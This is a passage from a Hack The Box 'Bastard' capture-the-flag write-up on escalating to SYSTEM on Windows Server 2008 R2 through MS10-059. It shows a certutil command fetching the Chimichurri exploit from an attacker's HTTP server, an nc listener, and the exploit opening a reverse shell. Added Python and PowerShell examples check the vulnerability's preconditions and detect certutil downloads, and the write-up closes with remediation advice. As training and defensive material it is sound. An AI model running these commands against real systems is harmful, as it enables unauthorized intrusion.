- KB982132: patches 1 vulnerability
- KB2079403: patches 1 vulnerability
- KB2698365: patches 1 vulnerability
- KB977894: patches 1 vulnerability
- KB2778930: patches 1 vulnerability
- KB2643719: patches 1 vulnerability
- KB2655992: patches 1 vulnerability
- KB2296011: patches 1 vulnerability
- KB982666: patches 1 vulnerability
- KB2620712: patches 1 vulnerability
- KB2584146: patches 1 vulnerability
- KB2032276: patches 1 vulnerability
- KB2654428: patches 1 vulnerability
- KB2509553: patches 1 vulnerability
- KB2647170: patches 1 vulnerability
- KB2644615: patches 1 vulnerability
- KB2544893: patches 1 vulnerability
- KB2620704: patches 1 vulnerability
- KB2685939: patches 1 vulnerability
[+] Missing service pack
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
[+] KB with the most recent release date
- ID: KB2817183
- Release date: 20130409

[+] Done. Displaying 207 of the 207 vulnerabilities found.

As we can see, the output from this tool is quite large! Numerous privilege escalation vulnerabilities are reported, but in this writeup we will exploit the one known as MS10-059 (CVE-2010-2554 & CVE-2010-2555).

Date: 20100810
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2555
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

As shown above, the privilege escalation vulnerability abuses the tracing feature for services within affected Windows systems. More specifically, this vulnerability occurs due to improperly configured access control list settings on the registry keys for the service tracing feature.

To exploit this vulnerability, we must have access to a user with impersonation rights.

Let’s check if our compromised user has these rights:

whoami /priv

Excellent! It appears our current user has ‘SeImpersonatePrivilege’ enabled.
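The triage we just did by hand (pick an elevation-of-privilege entry out of the Windows Exploit Suggester report, then confirm the impersonation prerequisite from whoami /priv) can be scripted, which is handy when the report runs to hundreds of entries as it does here. The Python below is an added example, not code from the original post or from Windows Exploit Suggester. The report excerpt it parses is a constructed sample of three records in the format shown above, and the whoami /priv table is a constructed sample in the real command's column layout, since the writeup runs the command but does not reproduce its output.

```python
"""Added example (not code from the original writeup or from Windows
Exploit Suggester): parse the tool's record blocks and the output of
`whoami /priv`, then check the two MS10-059 preconditions the writeup
establishes by hand: KB982799 missing and SeImpersonatePrivilege held.
The report excerpt and the whoami table below are constructed samples."""
import re
from collections import defaultdict

SAMPLE_REPORT = """\
Date: 20100810
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2555
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485
"""

# Constructed `whoami /priv` table; the column layout follows the real command.
SAMPLE_WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$")


def parse_report(text):
    """One dict per blank-line-delimited block of 'Key: value' lines."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if "CVE" in rec and "KB" in rec:
            records.append(rec)
    return records


def missing_kbs(records):
    """Map each missing KB to the set of CVEs it addresses."""
    by_kb = defaultdict(set)
    for rec in records:
        by_kb[rec["KB"]].add(rec["CVE"])
    return dict(by_kb)


def eop_with_public_exploit(records):
    """Elevation-of-privilege CVEs for which the tool lists an exploit URL
    (the tool prints the key as 'Exploit' or 'Exploits'); patch these first."""
    found = set()
    for rec in records:
        exploit = (rec.get("Exploit") or rec.get("Exploits") or "n/a").lower()
        if rec.get("Impact") == "Elevation of Privilege" and not exploit.startswith("n/a"):
            found.add(rec["CVE"])
    return sorted(found)


def enabled_privileges(whoami_text):
    """Privilege names whose State column reads Enabled."""
    enabled = set()
    for line in whoami_text.splitlines():
        m = PRIV_LINE.match(line)
        if m and m.group(2) == "Enabled":
            enabled.add(m.group(1))
    return enabled


def ms10_059_exposed(records, whoami_text):
    """Both preconditions the writeup relies on: the MS10-059 update
    (KB982799) is missing and the account holds SeImpersonatePrivilege."""
    return ("KB982799" in missing_kbs(records)
            and "SeImpersonatePrivilege" in enabled_privileges(whoami_text))
```

Feed parse_report the full report text saved from the tool and enabled_privileges the saved whoami /priv output; ms10_059_exposed then answers the question this section works through manually, and eop_with_public_exploit gives the patch-first list for whoever owns the host.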

Now that we have confirmed that we have impersonation rights, let’s locate the matching exploit for MS10-059.

A quick search engine query will reveal that the exploit can be downloaded from numerous sources.

For this writeup, we’ll download the exploit from the following GitHub repository:

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri

Once downloaded to our local host, we’ll proceed by transferring the file to our victim machine:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 …

certutil.exe -urlcache -split -f "http://10.10.14.52:8000/Chimichurri.exe" chimichurri.exe

**** Online ****
000000 …
0bf800
CertUtil: -URLCache command completed successfully.
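The certutil transfer shown above is a common "living off the land" download method, which also makes it a useful detection point for defenders. The following PowerShell snippet is an added example written for this writeup, not code from the original post; it flags process-creation command lines where certutil.exe is used to fetch or decode a file. The sample command lines are constructed for the example; in practice they would come from Security event ID 4688 (with command-line auditing enabled) or Sysmon event ID 1.

```powershell
# Added detection example (not from the original writeup). It scans a list of
# process command lines and reports those where certutil.exe is used as a
# downloader or decoder, which is the transfer technique shown above.

# Constructed sample command lines: two benign certutil uses, one download, one unrelated.
$SampleCommandLines = @(
    'certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256',
    'certutil.exe -verify -urlfetch C:\temp\server.cer',
    'certutil.exe -urlcache -split -f "http://10.10.14.52:8000/Chimichurri.exe" chimichurri.exe',
    'powershell.exe -NoProfile -Command Get-Date'
)

function Find-CertutilDownload {
    param([string[]]$CommandLines)
    # -urlcache together with -f or -split writes a remote file to disk;
    # -decode turns a base64 blob into a binary. Both are download/staging patterns.
    $pattern = '(?i)certutil(\.exe)?\s.*(-urlcache\s.*(-f|-split)|-decode\b)'
    $CommandLines | Where-Object { $_ -match $pattern } | ForEach-Object {
        # Extract the URL so an analyst sees the download source at a glance.
        $url = if ($_ -match '(?i)(https?://[^\s"'']+)') { $Matches[1] } else { $null }
        [pscustomobject]@{ CommandLine = $_; Url = $url }
    }
}

$hits = @(Find-CertutilDownload -CommandLines $SampleCommandLines)
"$($hits.Count) suspicious certutil invocation(s) found"
$hits | Format-List
```

Against the constructed sample, only the `-urlcache -split -f` line is reported, with its URL pulled out into the `Url` field. Hash verification and certificate chain checks with certutil are routine administrative uses and are deliberately left out of the pattern so the rule does not drown in benign noise.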

With our exploit transferred to the target system, we’ll need to open a listener on our attacking box for our reverse shell to connect back to:

sudo rlwrap nc -nlvp 80

Now that our listener is configured, we’ll provide the exploit with our attacking IP address and the port to connect back to:

chimichurri.exe 10.10.14.52 80

Now for the moment of truth, let’s fire up our exploit and see if we get a reverse shell!

/Chimichurri/–>This exploit gives you a Local System shell <BR>
/Chimichurri/–>Changing registry values…<BR>
/Chimichurri/–>Got SYSTEM token…<BR>
/Chimichurri/–>Running reverse shell…<BR>
/Chimichurri/–>Restoring default registry values…<BR>

Woohoo!

Our exploit successfully runs and we receive a shell as the system user!

Now let’s grab that root flag!

c:\inetpub\drupal-7.54>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt.txt

Conclusion and Review

To conclude our examination of this machine, let’s take a moment to reflect on what we can learn from this box:

  • When encountering a Drupal installation on a target system, check whether the Drupal version may be vulnerable to a variant of the ‘Drupalgeddon’ vulnerability. There are several forms of this vulnerability that impact different versions of Drupal, and many installations remain unpatched. In addition, there is a slew of other Drupal vulnerabilities that may be utilized for exploitation.
  • When targeting Windows systems, the ‘nc.exe’ binary can often be utilized to gain a reverse shell if code/command execution can be leveraged. In addition, it is also a useful tool for performing file transfers to and from Windows hosts.
  • MSFVenom can also be used to generate a malicious binary file that can be invoked to gain a reverse shell. It is essential to become well versed in operating this tool, as it will be a great asset both on your exam and in future engagements.
  • Lastly, when attacking Windows systems, the ‘windows-exploit-suggester’ tool can greatly aid your ability to discover vulnerabilities that may impact the target machine. Often, these vulnerabilities lead to privilege escalation when exploited.

Vulnerability Mitigation and Remediation

There are several key vulnerabilities and security issues present on this target. Let’s examine the nature of these vulnerabilities and discuss how we can defend against them:

  • The version of the Drupal installation running on the target system contains numerous vulnerabilities that can be exploited. It is crucial to ensure that software is regularly updated so that these vulnerabilities are patched.
  • It is wise to modify the default configuration of applications when hosted in a production environment. This includes removing or restricting access to unnecessary files on the hosted application that may aid an attacker. In this case, this includes files such as ‘CHANGELOG.txt’, which we utilized to gain the version information of the Drupal installation. Ultimately, this aided in our ability to achieve remote code execution.
  • The version of Windows running on the target system has not been properly patched or updated, leaving the system highly vulnerable to numerous methods of exploitation. In addition, the Windows version running on our victim machine is no longer supported, as Windows Server 2008 and Windows Server 2008 R2 reached end-of-life on January 14th, 2020. It is of the utmost importance for administrators to ensure that systems are continually patched and updated, and that unsupported operating systems are upgraded or decommissioned.

That concludes our analysis of Bastard!

This machine is great for learning about Drupal, as well as the infamous ‘Drupalgeddon’ vulnerability.

In addition, it is also good practice for exploring how to achieve reverse shells on Windows systems.

If you enjoyed this machine, head over to Hack The Box and give ch4p some respect!

Until next time,

Happy hacking!
